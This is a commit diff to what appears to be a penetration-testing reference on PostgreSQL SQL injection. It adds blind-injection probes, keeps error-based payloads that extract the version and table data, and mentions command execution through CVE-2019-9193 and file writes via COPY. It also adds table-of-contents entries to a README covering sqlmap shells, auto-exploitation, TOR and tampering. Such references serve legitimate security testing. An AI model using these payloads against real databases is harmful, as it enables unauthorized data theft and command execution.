PostgreSQL rewrite + LFI SSH

SQL Injection/PostgreSQL Injection.md

@@ -1,4 +1,15 @@
-# POSTGRESQL
+# PostgreSQL injection
+
+## Summary
+
+* [PostgreSQL Comments](#postgresql-comments)
+* [PostgreSQL Error Based](#postgresql-error-based)
+* [PostgreSQL Blind](#postgresql-blind)
+* [PostgreSQL Time Based](#postgresql-time-based)
+* [PostgreSQL File Read](#postgresql-file-read)
+* [PostgreSQL File Write](#postgresql-file-write)
+* [PostgreSQL Command execution](#postgresql-command-execution)
+* [References](#references)
 
 ## PostgreSQL Comments
 
@@ -7,7 +18,7 @@
 /**/  
 ```
 
-## PostgreSQL Error Based - Basic
+## PostgreSQL Error Based
 
 ```sql
 ,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
@@ -16,6 +27,13 @@
 ,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
 ```
 
+## PostgreSQL Blind
+
+```sql
+' and substr(version(),1,10) = 'PostgreSQL' and '1  -> OK
+' and substr(version(),1,10) = 'PostgreXXX' and '1  -> KO
+```
+
 ## PostgreSQL Time Based
 
 ```sql
@@ -47,7 +65,7 @@ SELECT * FROM pentestlab;
 COPY pentestlab(t) TO '/tmp/pentestlab';
 ```
 
-## PostgreSQL - Command execution
+## PostgreSQL Command execution
 
 CVE-2019–9193, can be used from [Metasploit](https://github.com/rapid7/metasploit-framework/pull/11598) if you have a direct access to the database, otherwise you need to execute manually the following SQL queries. 
 
@@ -64,4 +82,5 @@ DROP TABLE IF EXISTS cmd_exec;          -- [Optional] Remove the table
 ## References
 
 * [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
-* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
+* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
+* [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803)

SQL Injection/README.md

@@ -19,6 +19,17 @@ Attempting to manipulate SQL queries may have goals including:
 * [Entry point detection](#entry-point-detection)
 * [DBMS Identification](#dbms-identification)
 * [SQL injection using SQLmap](#sql-injection-using-sqlmap)
+  * [Basic arguments for SQLmap](#basic-arguments-for-sqlmap)
+  * [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent)
+  * [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragent-header-referer-cookie)
+  * [Second order injection](#second-order-injection)
+  * [Shell](#shell)
+  * [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit)
+  * [Using TOR with SQLmap](#using-tor-with-sqlmap)
+  * [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap)
+  * [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy)
+  * [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
+  * [General tamper option and tamper's list](#general-tamper-option-and-tamper-s-list)
 * [Authentication bypass](#authentication-bypass)
 * [Polyglot injection](#polyglot-injection-multicontext)
 * [Routed injection](#routed-injection)